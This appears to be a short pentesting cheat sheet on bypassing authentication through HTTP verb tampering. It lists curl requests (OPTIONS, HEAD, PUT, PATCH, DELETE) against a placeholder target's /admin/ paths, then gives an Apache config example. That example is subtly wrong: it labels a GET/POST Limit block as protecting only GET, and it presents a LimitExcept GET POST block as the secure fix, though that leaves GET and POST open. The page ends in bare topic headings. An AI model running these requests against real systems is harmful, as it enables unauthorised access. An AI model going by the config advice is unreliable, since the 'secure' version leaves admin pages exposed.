Authentication Bypass
HTTP Verb Tampering
Check Accepted Methods
curl -i -X OPTIONS http://TARGET/admin/
# Look for: Allow: POST,OPTIONS,HEAD,GETBypass Authentication
# If GET/POST require auth, try HEAD
curl -X HEAD http://TARGET/admin/reset.php
# Or try other methods
curl -X PUT http://TARGET/admin/
curl -X PATCH http://TARGET/admin/
curl -X DELETE http://TARGET/admin/Insecure Server Config Example (Apache)
<!-- Vulnerable: only protects GET -->
<Limit GET POST>
Require valid-user
</Limit>
<!-- Secure: protects all methods -->
<LimitExcept GET POST>
Require valid-user
</LimitExcept>Bypass Security Filters via Verb Change
Username Enumeration
Password Brute force attack
Authentication Bypass Logic Flaw
Finding password reset forms
Cookie Tampering
strcmp() PHP bypass




Last updated